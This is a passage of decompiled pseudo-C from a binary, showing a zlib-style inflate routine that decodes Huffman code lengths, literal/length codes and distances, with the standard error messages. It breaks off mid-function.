                                                                                                                                                  									 *(__ebp - 0x34) = __eax;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L175:
                                                                                                                                                  									__eax = memcpy( *(__ebp - 0x1c),  *(__ebp - 8), __eax);
                                                                                                                                                  									__eax =  *(__ebp - 0x34);
                                                                                                                                                  									__esp = __esp + 0xc;
                                                                                                                                                  									__ecx =  *(__ebp - 4);
                                                                                                                                                  									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                  									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                  									 *(__ebp - 0x18) =  *(__ebp - 0x18) - __eax;
                                                                                                                                                  									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + __eax;
                                                                                                                                                  									__ebx[0x10] = __ebx[0x10] - __eax;
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									 *(__ebp - 4) = __ecx;
                                                                                                                                                  									goto L135;
                                                                                                                                                  								case 0x10:
                                                                                                                                                  									goto L0;
                                                                                                                                                  								case 0x11:
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L189:
                                                                                                                                                  										__eflags = _t920[0x1a] - _t920[0x17];
                                                                                                                                                  										if(_t920[0x1a] >= _t920[0x17]) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L184:
                                                                                                                                                  										__eflags = _t1103 - 3;
                                                                                                                                                  										if(_t1103 >= 3) {
                                                                                                                                                  											L188:
                                                                                                                                                  											_t944 = _t1054 & 0x00000007;
                                                                                                                                                  											_t1054 = _t1054 >> 3;
                                                                                                                                                  											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  											 *(_t920 + 0x70 + ( *(0xd4908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = _t944;
                                                                                                                                                  											_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                  											_t1103 = _t1103 - 3;
                                                                                                                                                  											__eflags = _t1103;
                                                                                                                                                  											_t928 =  *(_t1164 - 4);
                                                                                                                                                  											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										L185:
                                                                                                                                                  										_t804 =  *(_t1164 - 8);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L186:
                                                                                                                                                  											__eflags = _t928;
                                                                                                                                                  											if(_t928 == 0) {
                                                                                                                                                  												goto L322;
                                                                                                                                                  											}
                                                                                                                                                  											L187:
                                                                                                                                                  											 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                  											_t806 = ( *_t804 & 0x000000ff) << _t1103;
                                                                                                                                                  											_t1103 = _t1103 + 8;
                                                                                                                                                  											_t928 =  *(_t1164 - 4);
                                                                                                                                                  											_t1054 = _t1054 + _t806;
                                                                                                                                                  											_t804 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  											 *(_t1164 - 8) = _t804;
                                                                                                                                                  											__eflags = _t1103 - 3;
                                                                                                                                                  											if(_t1103 < 3) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L188;
                                                                                                                                                  										}
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L190:
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L192:
                                                                                                                                                  										__eflags = _t920[0x1a] - 0x13;
                                                                                                                                                  										if(_t920[0x1a] >= 0x13) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L191:
                                                                                                                                                  										 *(_t920 + 0x70 + ( *(0xd4908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = 0;
                                                                                                                                                  										_t368 =  &(_t920[0x1a]);
                                                                                                                                                  										 *_t368 = _t920[0x1a] + 1;
                                                                                                                                                  										__eflags =  *_t368;
                                                                                                                                                  									}
                                                                                                                                                  									L193:
                                                                                                                                                  									_t810 =  &(_t920[0x14c]);
                                                                                                                                                  									_t920[0x13] = _t810;
                                                                                                                                                  									_t920[0x1b] = _t810;
                                                                                                                                                  									_t920[0x15] = 7;
                                                                                                                                                  									_t813 = E000D33B4(0,  &(_t920[0x1c]), 0x13,  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                                                                  									_t1166 = _t1166 + 0x18;
                                                                                                                                                  									 *(_t1164 - 0x20) = _t813;
                                                                                                                                                  									__eflags = _t813;
                                                                                                                                                  									if(_t813 == 0) {
                                                                                                                                                  										L196:
                                                                                                                                                  										_t920[0x1a] = _t920[0x1a] & 0x00000000;
                                                                                                                                                  										 *_t920 = 0x12;
                                                                                                                                                  										goto L224;
                                                                                                                                                  									}
                                                                                                                                                  									L194:
                                                                                                                                                  									_t1125[6] = "invalid code lengths set";
                                                                                                                                                  									goto L195;
                                                                                                                                                  								case 0x12:
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L224:
                                                                                                                                                  										_t949 = _t920[0x1a];
                                                                                                                                                  										 *(_t1164 - 0x2c) = _t949;
                                                                                                                                                  										__eflags = _t949 - _t920[0x19] + _t920[0x18];
                                                                                                                                                  										if(_t949 < _t920[0x19] + _t920[0x18]) {
                                                                                                                                                  											goto L199;
                                                                                                                                                  										} else {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L199:
                                                                                                                                                  											_t817 =  *((intOrPtr*)(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4));
                                                                                                                                                  											 *(_t1164 - 0x34) = _t817;
                                                                                                                                                  											__eflags = (_t817 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                                                                  											if((_t817 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											L197:
                                                                                                                                                  											_t935 =  *(_t1164 - 4);
                                                                                                                                                  											__eflags = _t935;
                                                                                                                                                  											if(_t935 == 0) {
                                                                                                                                                  												goto L323;
                                                                                                                                                  											}
                                                                                                                                                  											L198:
                                                                                                                                                  											_t1072 =  *(_t1164 - 8);
                                                                                                                                                  											 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                  											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1072 & 0x000000ff) << _t1103);
                                                                                                                                                  											 *(_t1164 - 8) =  &(_t1072[1]);
                                                                                                                                                  											_t1103 = _t1103 + 8;
                                                                                                                                                  											__eflags = _t1103;
                                                                                                                                                  										}
                                                                                                                                                  										L200:
                                                                                                                                                  										_push(0x10);
                                                                                                                                                  										_t1075 = _t817 >> 0x10;
                                                                                                                                                  										_pop(_t956);
                                                                                                                                                  										__eflags = _t1075 - _t956;
                                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                                  											L202:
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												L208:
                                                                                                                                                  												_t1076 =  *(_t1164 - 0xc);
                                                                                                                                                  												_push(0x11);
                                                                                                                                                  												_pop(_t957);
                                                                                                                                                  												__eflags =  *(_t1164 - 0x32) - _t957;
                                                                                                                                                  												_t958 = _t817 & 0x000000ff;
                                                                                                                                                  												if( *(_t1164 - 0x32) != _t957) {
                                                                                                                                                  													L214:
                                                                                                                                                  													 *(_t1164 - 0x10) = _t958;
                                                                                                                                                  													while(1) {
                                                                                                                                                  														L215:
                                                                                                                                                  														_t432 = _t958 + 7; // 0x18
                                                                                                                                                  														__eflags = _t1103 - _t432;
                                                                                                                                                  														if(_t1103 >= _t432) {
                                                                                                                                                  															break;
                                                                                                                                                  														}
                                                                                                                                                  														L216:
                                                                                                                                                  														_t935 =  *(_t1164 - 4);
                                                                                                                                                  														__eflags = _t935;
                                                                                                                                                  														if(_t935 == 0) {
                                                                                                                                                  															goto L323;
                                                                                                                                                  														}
                                                                                                                                                  														L217:
                                                                                                                                                  														 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                  														_t958 =  *(_t1164 - 0x10);
                                                                                                                                                  														_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                                                                  														 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  														_t1103 = _t1103 + 8;
                                                                                                                                                  														 *(_t1164 - 0xc) = _t1076;
                                                                                                                                                  													}
                                                                                                                                                  													L218:
                                                                                                                                                  													_t1077 = _t1076 >> _t958;
                                                                                                                                                  													_t1078 = _t1077 >> 7;
                                                                                                                                                  													_push(0xfffffff9);
                                                                                                                                                  													_pop(_t821);
                                                                                                                                                  													_t961 = (_t1077 & 0x0000007f) + 0xb;
                                                                                                                                                  													_t822 = _t821 -  *(_t1164 - 0x10);
                                                                                                                                                  													__eflags = _t822;
                                                                                                                                                  													L219:
                                                                                                                                                  													 *(_t1164 - 0x34) =  *(_t1164 - 0x34) & 0x00000000;
                                                                                                                                                  													_t1103 = _t1103 + _t822;
                                                                                                                                                  													__eflags = _t1103;
                                                                                                                                                  													L220:
                                                                                                                                                  													 *(_t1164 - 0x30) = _t961;
                                                                                                                                                  													 *(_t1164 - 0xc) = _t1078;
                                                                                                                                                  													 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  													__eflags = _t961 +  *(_t1164 - 0x2c) - _t920[0x19] + _t920[0x18];
                                                                                                                                                  													if(_t961 +  *(_t1164 - 0x2c) > _t920[0x19] + _t920[0x18]) {
                                                                                                                                                  														L227:
                                                                                                                                                  														_t1125[6] = "invalid bit length repeat";
                                                                                                                                                  														 *_t920 = 0x1d;
                                                                                                                                                  														L228:
                                                                                                                                                  														__eflags =  *_t920 - 0x1d;
                                                                                                                                                  														if( *_t920 == 0x1d) {
                                                                                                                                                  															L133:
                                                                                                                                                  															_t1054 =  *(_t1164 - 0xc);
                                                                                                                                                  															goto L134;
                                                                                                                                                  														}
                                                                                                                                                  														L229:
                                                                                                                                                  														__eflags = _t920[0x9c];
                                                                                                                                                  														if(_t920[0x9c] != 0) {
                                                                                                                                                  															L231:
                                                                                                                                                  															_t826 =  &(_t920[0x14c]);
                                                                                                                                                  															_t920[0x13] = _t826;
                                                                                                                                                  															_t920[0x1b] = _t826;
                                                                                                                                                  															_t920[0x15] = 9;
                                                                                                                                                  															_t829 = E000D33B4(1,  &(_t920[0x1c]), _t920[0x18],  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                                                                  															_t1166 = _t1166 + 0x18;
                                                                                                                                                  															 *(_t1164 - 0x20) = _t829;
                                                                                                                                                  															__eflags = _t829;
                                                                                                                                                  															if(_t829 == 0) {
                                                                                                                                                  																L233:
                                                                                                                                                  																_t920[0x14] = _t920[0x1b];
                                                                                                                                                  																_t920[0x16] = 6;
                                                                                                                                                  																_t835 = E000D33B4(2, _t920 + (_t920[0x18] + 0x38) * 2, _t920[0x19],  &(_t920[0x1b]),  &(_t920[0x16]),  &(_t920[0xbc]));
                                                                                                                                                  																_t1166 = _t1166 + 0x18;
                                                                                                                                                  																 *(_t1164 - 0x20) = _t835;
                                                                                                                                                  																__eflags = _t835;
                                                                                                                                                  																if(_t835 == 0) {
                                                                                                                                                  																	L235:
                                                                                                                                                  																	__eflags =  *((intOrPtr*)(_t1164 + 0xc)) - 6;
                                                                                                                                                  																	_t935 =  *(_t1164 - 4);
                                                                                                                                                  																	 *_t920 = 0x13;
                                                                                                                                                  																	if( *((intOrPtr*)(_t1164 + 0xc)) == 6) {
                                                                                                                                                  																		goto L323;
                                                                                                                                                  																	}
                                                                                                                                                  																	L236:
                                                                                                                                                  																	_t1081 =  *(_t1164 - 0xc);
                                                                                                                                                  																	goto L237;
                                                                                                                                                  																}
                                                                                                                                                  																L234:
                                                                                                                                                  																_t1125[6] = "invalid distances set";
                                                                                                                                                  																L195:
                                                                                                                                                  																 *_t920 = 0x1d;
                                                                                                                                                  																goto L133;
                                                                                                                                                  															}
                                                                                                                                                  															L232:
                                                                                                                                                  															_t1125[6] = "invalid literal/lengths set";
                                                                                                                                                  															goto L195;
                                                                                                                                                  														}
                                                                                                                                                  														L230:
                                                                                                                                                  														_t1125[6] = "invalid code -- missing end-of-block";
                                                                                                                                                  														goto L195;
                                                                                                                                                  													}
                                                                                                                                                  													L221:
                                                                                                                                                  													_t1036 =  *(_t1164 - 0x30);
                                                                                                                                                  													__eflags = _t1036;
                                                                                                                                                  													if(_t1036 == 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													L222:
                                                                                                                                                  													_t1098 =  *(_t1164 - 0x34);
                                                                                                                                                  													do {
                                                                                                                                                  														L223:
                                                                                                                                                  														 *(_t920 + 0x70 + _t920[0x1a] * 2) = _t1098;
                                                                                                                                                  														_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                  														_t1036 = _t1036 - 1;
                                                                                                                                                  														__eflags = _t1036;
                                                                                                                                                  													} while (_t1036 != 0);
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												L209:
                                                                                                                                                  												 *(_t1164 - 0x10) = _t958;
                                                                                                                                                  												while(1) {
                                                                                                                                                  													L210:
                                                                                                                                                  													_t422 = _t958 + 3; // 0x14
                                                                                                                                                  													__eflags = _t1103 - _t422;
                                                                                                                                                  													if(_t1103 >= _t422) {
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													L211:
                                                                                                                                                  													_t935 =  *(_t1164 - 4);
                                                                                                                                                  													__eflags = _t935;
                                                                                                                                                  													if(_t935 == 0) {
                                                                                                                                                  														goto L323;
                                                                                                                                                  													}
                                                                                                                                                  													L212:
                                                                                                                                                  													 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                  													_t958 =  *(_t1164 - 0x10);
                                                                                                                                                  													_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                                                                  													 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  													_t1103 = _t1103 + 8;
                                                                                                                                                  													 *(_t1164 - 0xc) = _t1076;
                                                                                                                                                  												}
                                                                                                                                                  												L213:
                                                                                                                                                  												_t1099 = _t1076 >> _t958;
                                                                                                                                                  												_t1078 = _t1099 >> 3;
                                                                                                                                                  												_push(0xfffffffd);
                                                                                                                                                  												_pop(_t912);
                                                                                                                                                  												_t961 = (_t1099 & 0x00000007) + 3;
                                                                                                                                                  												_t822 = _t912 -  *(_t1164 - 0x10);
                                                                                                                                                  												goto L219;
                                                                                                                                                  											}
                                                                                                                                                  											L203:
                                                                                                                                                  											_t1046 = (_t817 >> 0x00000008 & 0x000000ff) + 2;
                                                                                                                                                  											 *(_t1164 - 0x34) = _t1046;
                                                                                                                                                  											__eflags = _t1103 - _t1046;
                                                                                                                                                  											if(_t1103 >= _t1046) {
                                                                                                                                                  												L206:
                                                                                                                                                  												_t1047 = _t817 & 0x000000ff;
                                                                                                                                                  												_t916 =  *(_t1164 - 0x2c);
                                                                                                                                                  												_t1103 = _t1103 - _t1047;
                                                                                                                                                  												_t1054 =  *(_t1164 - 0xc) >> _t1047;
                                                                                                                                                  												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  												__eflags = _t916;
                                                                                                                                                  												if(_t916 == 0) {
                                                                                                                                                  													L226:
                                                                                                                                                  													_t1125[6] = "invalid bit length repeat";
                                                                                                                                                  													goto L17;
                                                                                                                                                  												}
                                                                                                                                                  												L207:
                                                                                                                                                  												_t1078 = _t1054 >> 2;
                                                                                                                                                  												_t961 = (_t1054 & 0x00000003) + 3;
                                                                                                                                                  												 *(_t1164 - 0x34) =  *(_t920 + 0x6e + _t916 * 2) & 0x0000ffff;
                                                                                                                                                  												_t1103 = _t1103 - 2;
                                                                                                                                                  												goto L220;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L204;
                                                                                                                                                  											}
                                                                                                                                                  											while(1) {
                                                                                                                                                  												L204:
                                                                                                                                                  												_t935 =  *(_t1164 - 4);
                                                                                                                                                  												__eflags = _t935;
                                                                                                                                                  												if(_t935 == 0) {
                                                                                                                                                  													goto L323;
                                                                                                                                                  												}
                                                                                                                                                  												L205:
                                                                                                                                                  												 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                  												_t1102 = ( *( *(_t1164 - 8)) & 0x000000ff) << _t1103;
                                                                                                                                                  												_t1103 = _t1103 + 8;
                                                                                                                                                  												 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + _t1102;
                                                                                                                                                  												 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  												__eflags = _t1103 -  *(_t1164 - 0x34);
                                                                                                                                                  												if(_t1103 <  *(_t1164 - 0x34)) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												goto L206;
                                                                                                                                                  											}
                                                                                                                                                  											goto L323;
                                                                                                                                                  										}
                                                                                                                                                  										L201:
                                                                                                                                                  										_t1053 = _t817 >> 0x00000008 & 0x000000ff;
                                                                                                                                                  										_t1103 = _t1103 - _t1053;
                                                                                                                                                  										 *(_t1164 - 0xc) =  *(_t1164 - 0xc) >> _t1053;
                                                                                                                                                  										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  										 *(_t920 + 0x70 +  *(_t1164 - 0x2c) * 2) = _t1075;
                                                                                                                                                  										_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                  									}
                                                                                                                                                  									L225:
                                                                                                                                                  									goto L228;
                                                                                                                                                  								case 0x13:
                                                                                                                                                  									L237:
                                                                                                                                                  									 *_t920 = 0x14;
                                                                                                                                                  									goto L238;
                                                                                                                                                  								case 0x14:
                                                                                                                                                  									L238:
                                                                                                                                                  									__eflags = _t935 - 6;
                                                                                                                                                  									if(_t935 < 6) {
                                                                                                                                                  										L242:
                                                                                                                                                  										_t920[0x6f1] = _t920[0x6f1] & 0x00000000;
                                                                                                                                                  										 *(_t1164 - 0x30) = _t920[0x13];
                                                                                                                                                  										_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 & _t1081) * 4);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L245:
                                                                                                                                                  											__eflags = (_t842 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                                                                  											if((_t842 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											L243:
                                                                                                                                                  											_t935 =  *(_t1164 - 4);
                                                                                                                                                  											__eflags = _t935;
                                                                                                                                                  											if(_t935 == 0) {
                                                                                                                                                  												goto L323;
                                                                                                                                                  											}
                                                                                                                                                  											L244:
                                                                                                                                                  											 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                  											_t971 = _t1103;
                                                                                                                                                  											_t1103 = _t1103 + 8;
                                                                                                                                                  											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  											 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  											 *(_t1164 - 0xc) = _t1081 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t971);
                                                                                                                                                  											__eflags = 1;
                                                                                                                                                  											_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
                                                                                                                                                  											_t1081 =  *(_t1164 - 0xc);
                                                                                                                                                  										}
                                                                                                                                                  										L246:
                                                                                                                                                  										__eflags = _t842;
                                                                                                                                                  										if(_t842 == 0) {
                                                                                                                                                  											L252:
                                                                                                                                                  											_t975 = _t842 >> 0x00000008 & 0x000000ff;
                                                                                                                                                  											_t920[0x6f1] = _t920[0x6f1] + _t975;
                                                                                                                                                  											_t1103 = _t1103 - _t975;
                                                                                                                                                  											_t1054 = _t1081 >> _t975;
                                                                                                                                                  											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  											_t920[0x10] = _t842 >> 0x10;
                                                                                                                                                  											__eflags = _t842;
                                                                                                                                                  											if(_t842 != 0) {
                                                                                                                                                  												L254:
                                                                                                                                                  												__eflags = _t842 & 0x00000020;
                                                                                                                                                  												if((_t842 & 0x00000020) == 0) {
                                                                                                                                                  													L256:
                                                                                                                                                  													_t928 =  *(_t1164 - 4);
                                                                                                                                                  													__eflags = _t842 & 0x00000040;
                                                                                                                                                  													if((_t842 & 0x00000040) == 0) {
                                                                                                                                                  														L258:
                                                                                                                                                  														_t848 = _t842 & 0xf;
                                                                                                                                                  														__eflags = _t848;
                                                                                                                                                  														 *_t920 = 0x15;
                                                                                                                                                  														_t920[0x12] = _t848;
                                                                                                                                                  														goto L259;
                                                                                                                                                  													}
                                                                                                                                                  													L257:
                                                                                                                                                  													_t1125[6] = "invalid literal/length code";
                                                                                                                                                  													goto L31;
                                                                                                                                                  												}
                                                                                                                                                  												L255:
                                                                                                                                                  												_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                                                                  												 *_t920 = 0xb;
                                                                                                                                                  												goto L134;
                                                                                                                                                  											}
                                                                                                                                                  											L253:
                                                                                                                                                  											 *_t920 = 0x19;
                                                                                                                                                  											goto L134;
                                                                                                                                                  										}
                                                                                                                                                  										L247:
                                                                                                                                                  										__eflags = _t842 & 0x000000f0;
                                                                                                                                                  										if((_t842 & 0x000000f0) != 0) {
                                                                                                                                                  											goto L252;
                                                                                                                                                  										}
                                                                                                                                                  										L248:
                                                                                                                                                  										_t926 = _t842 >> 8;
                                                                                                                                                  										_t1096 = _t842;
                                                                                                                                                  										 *(_t1164 - 0x34) = _t1096;
                                                                                                                                                  										_t842 =  *( *(_t1164 - 0x30) + ((((1 << (_t842 & 0x000000ff) + (_t926 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t926 & 0x000000ff)) + (_t842 >> 0x10)) * 4);
                                                                                                                                                  										_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                  										_t920 =  *(_t1164 - 0x24);
                                                                                                                                                  										__eflags = (_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) - _t1103;
                                                                                                                                                  										if((_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) <= _t1103) {
                                                                                                                                                  											L251:
                                                                                                                                                  											_t1125 =  *(_t1164 + 8);
                                                                                                                                                  											_t1025 = _t1096 & 0x000000ff;
                                                                                                                                                  											_t1081 =  *(_t1164 - 0xc) >> _t1025;
                                                                                                                                                  											_t1103 = _t1103 - _t1025;
                                                                                                                                                  											__eflags = _t1103;
                                                                                                                                                  											_t920[0x6f1] = _t1025;
                                                                                                                                                  											goto L252;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L249;
                                                                                                                                                  										}
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L249:
                                                                                                                                                  											_t1153 =  *(_t1164 - 4);
                                                                                                                                                  											__eflags = _t1153;
                                                                                                                                                  											if(_t1153 == 0) {
                                                                                                                                                  												goto L322;
                                                                                                                                                  											}
                                                                                                                                                  											L250:
                                                                                                                                                  											 *(_t1164 - 4) = _t1153 - 1;
                                                                                                                                                  											_t1155 =  *(_t1164 - 8);
                                                                                                                                                  											 *(_t1164 - 0x10) = _t1103 + 8;
                                                                                                                                                  											_t1124 = _t1096 & 0x000000ff;
                                                                                                                                                  											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1155 & 0x000000ff) << _t1103);
                                                                                                                                                  											 *(_t1164 - 8) =  &(_t1155[1]);
                                                                                                                                                  											_t842 =  *(_t920[0x13] + ((((1 << (_t1096 & 0x000000ff) + _t1124) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1124) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                  											_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                  											__eflags = (_t842 >> 0x00000008 & 0x000000ff) + _t1124 - _t1103;
                                                                                                                                                  											if((_t842 >> 0x00000008 & 0x000000ff) + _t1124 > _t1103) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L251;
                                                                                                                                                  										}
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L239:
                                                                                                                                                  									_t901 =  *(_t1164 - 0x18);
                                                                                                                                                  									__eflags = _t901 - 0x102;
                                                                                                                                                  									if(_t901 < 0x102) {
                                                                                                                                                  										goto L242;
                                                                                                                                                  									}
                                                                                                                                                  									L240:
                                                                                                                                                  									_push( *((intOrPtr*)(_t1164 - 0x28)));
                                                                                                                                                  									_t1125[3] =  *(_t1164 - 0x1c);
                                                                                                                                                  									_t920 =  *(_t1164 - 0x24);
                                                                                                                                                  									_t1125[4] = _t901;
                                                                                                                                                  									 *_t1125 =  *(_t1164 - 8);
                                                                                                                                                  									_t1125[1] = _t935;
                                                                                                                                                  									_push(_t1125);
                                                                                                                                                  									_t920[0xe] = _t1081;
                                                                                                                                                  									_t920[0xf] = _t1103;
                                                                                                                                                  									E000D3840();
                                                                                                                                                  									__eflags =  *_t920 - 0xb;
                                                                                                                                                  									_t1054 = _t920[0xe];
                                                                                                                                                  									_t1103 = _t920[0xf];
                                                                                                                                                  									 *(_t1164 - 0x1c) = _t1125[3];
                                                                                                                                                  									_t928 = _t1125[1];
                                                                                                                                                  									 *(_t1164 - 0x18) = _t1125[4];
                                                                                                                                                  									 *(_t1164 - 8) =  *_t1125;
                                                                                                                                                  									 *(_t1164 - 4) = _t928;
                                                                                                                                                  									 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  									 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  									if( *_t920 == 0xb) {
                                                                                                                                                  										_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                                                                  									}
                                                                                                                                                  									goto L135;
                                                                                                                                                  								case 0x15:
                                                                                                                                                  									L259:
                                                                                                                                                  									_t1129 = _t920[0x12];
                                                                                                                                                  									__eflags = _t1129;
                                                                                                                                                  									if(_t1129 == 0) {
                                                                                                                                                  										L265:
                                                                                                                                                  										_t920[0x6f2] = _t920[0x10];
                                                                                                                                                  										 *_t920 = 0x16;
                                                                                                                                                  										goto L266;
                                                                                                                                                  									}
                                                                                                                                                  									L260:
                                                                                                                                                  									__eflags = _t1103 - _t1129;
                                                                                                                                                  									if(_t1103 >= _t1129) {
                                                                                                                                                  										L264:
                                                                                                                                                  										_t1015 = _t1129;
                                                                                                                                                  										_t1103 = _t1103 - _t1129;
                                                                                                                                                  										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  										_t891 = (1 << _t1015) - 0x00000001 & _t1054;
                                                                                                                                                  										_t1054 = _t1054 >> _t1015;
                                                                                                                                                  										_t920[0x10] = _t920[0x10] + _t891;
                                                                                                                                                  										_t580 =  &(_t920[0x6f1]);
                                                                                                                                                  										 *_t580 = _t920[0x6f1] + _t1129;
                                                                                                                                                  										__eflags =  *_t580;
                                                                                                                                                  										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  										goto L265;
                                                                                                                                                  									}
                                                                                                                                                  									L261:
                                                                                                                                                  									_t892 =  *(_t1164 - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L262:
                                                                                                                                                  										__eflags = _t928;
                                                                                                                                                  										if(_t928 == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L263:
                                                                                                                                                  										 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                  										_t894 = ( *_t892 & 0x000000ff) << _t1103;
                                                                                                                                                  										_t1103 = _t1103 + 8;
                                                                                                                                                  										_t928 =  *(_t1164 - 4);
                                                                                                                                                  										_t1054 = _t1054 + _t894;
                                                                                                                                                  										_t892 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  										 *(_t1164 - 8) = _t892;
                                                                                                                                                  										__eflags = _t1103 - _t1129;
                                                                                                                                                  										if(_t1103 < _t1129) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L264;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 0x16:
                                                                                                                                                  									L266:
                                                                                                                                                  									_t1130 = _t920[0x14];
                                                                                                                                                  									 *(_t1164 - 0x30) = _t1130;
                                                                                                                                                  									_t855 =  *(_t1130 + ((1 << _t920[0x16]) - 0x00000001 & _t1054) * 4);
                                                                                                                                                  									__eflags = 0xad - _t1103;
                                                                                                                                                  									if(0xad <= _t1103) {
                                                                                                                                                  										L270:
                                                                                                                                                  										__eflags = _t855 & 0x000000f0;
                                                                                                                                                  										if((_t855 & 0x000000f0) != 0) {
                                                                                                                                                  											L275:
                                                                                                                                                  											_t1125 =  *(_t1164 + 8);
                                                                                                                                                  											_t984 = _t855 >> 0x00000008 & 0x000000ff;
                                                                                                                                                  											_t920[0x6f1] = _t920[0x6f1] + _t984;
                                                                                                                                                  											_t1103 = _t1103 - _t984;
                                                                                                                                                  											_t1054 = _t1054 >> _t984;
                                                                                                                                                  											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  											__eflags = _t855 & 0x00000040;
                                                                                                                                                  											if((_t855 & 0x00000040) == 0) {
                                                                                                                                                  												L277:
                                                                                                                                                  												 *_t920 = 0x17;
                                                                                                                                                  												_t857 = _t855 & 0xf;
                                                                                                                                                  												__eflags = _t857;
                                                                                                                                                  												_t920[0x11] = _t855 >> 0x10;
                                                                                                                                                  												_t920[0x12] = _t857;
                                                                                                                                                  												goto L278;
                                                                                                                                                  											}
                                                                                                                                                  											L276:
